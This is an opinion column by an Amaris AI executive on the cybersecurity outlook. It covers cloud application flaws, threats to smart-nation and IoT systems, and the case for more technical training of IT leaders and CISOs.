By Prof Yu Chien Siang
Prof Yu Chien Siang, Chief Innovation & Trust Officer (CITO) at Amaris AI. (Photo: Prof You Chien Siang)
Cybersecurity damage is projected to cost the world US$6 trillion annually by 2021. Steve Morgan, founder and editor-in-chief of Cybersecurity Ventures – a US-based researcher and publisher that covers the global cyber economy – believes that cybercriminal activity will be one of the biggest challenges that we will face in the next two decades.
It also predicts that the damage costs arising from ransomware attacks will rise to US$11.5 billion in 2019 and that a business will fall victim to a ransomware attack every 14 seconds by that time.
So what does this mean? Yes, we crucially need to beef up and advance our cybersecurity efforts and technologies.
There are currently two strong trends in the cybersecurity landscape – cloud application security and exploiting the internet via pervasive computing.
Firstly, cloud application security has become more important than ever, due to the steady migration of many enterprise systems to public cloud providers such as Amazon Web Services and Google Cloud.
Although cloud infrastructural security has been maturing rapidly and has typically been good, cloud-based applications with their possible security flaws and bugs remain the Achilles heel for enterprise security. Importantly, there has been little success so far in solving this problem and thus, we are plagued with constant code patching when software vulnerabilities get discovered.
Despite technical hardware countermeasures like DEP (Data Execution Prevention) and ALSR (Address Space Layout Randomisation), attacks using ROP (Return-Orientated Programming) or JOP (Jump Orientated Programming) coupled with fileless attack techniques will break these defences.
Consequently, enterprises have to resort to expensive penetration testing and code examination, which cannot scale and will never be agile. Penetration testing cannot discover all of the vulnerabilities present and code examination requires too many hours and eyeballs by software coding experts who, despite best efforts, can still miss finding defects residing in drivers or are obfuscated due to complex dependencies, for example.
Secondly, the drive to develop our Smart Nation is itself a digital transformation to exploit the Internet via pervasive computing.
As a result, we will see the emergence of new threats evolving from the use of artificial intelligence, the introduction of Industrial Internet of Things, as well as the possible subversion of robots and drones, as these become appended to the internet. One nightmare scenario would involve the mass hacking of every smart power meter in Singapore, thus allowing the hacker to turn off electricity supply to all homes and factories.
Unfortunately, we have not yet seen defensive ideas like security by design, privacy by design and resilient design making good traction. This is an area that is not well researched by our universities and the know-how of how to do things right from the start and how to maintain robust IT operations is restricted to only a handful of larger companies, such as Netflix.
Without a strong defensive architecture, important smart nation systems may be eventually subjected to cyber subversion. We should expect attacks to come, fast and furious, as the stakes become higher.
I also suspect that many software developers still do not understand how to design robust IT systems. They also do not have the automated tools to design the secure systems that are needed. Our IT leaders would need to be more technical, to truly understand the new threat landscape and to get their development teams to adopt new systems development methodologies that will integrate cyber security during the design phase.
Even Chief Information Security Officers (CISO) of organisations here may not have been formally trained and hence, may not know what needs to be done.
In Israel, the CISOs need to attend six weeks of intensive training at an academy, and like in the armed forces, a combatant officer should at least be armed with the basic knowledge and skills to do his job. Cyber security is no different from military defence, and we should devote more professional development to this important sector.
To boost cybersecurity efforts, companies and users should always ensure that they have the means to know how best to respond if and when there is a security breach. Visibility is key to enterprise security, which includes knowing how existing defences are coping with ongoing attacks and how the attackers are improving themselves.
Sometimes, this means that companies must look for professional help and, if the systems are weak, they may need to see the “doctor” (cyber security specialists) or visit the “hospital” (cyber security monitoring company) before their condition becomes fatal.
Prof Yu Chien Siang is the Chief Innovation & Trust Officer (CITO) of Amaris AI.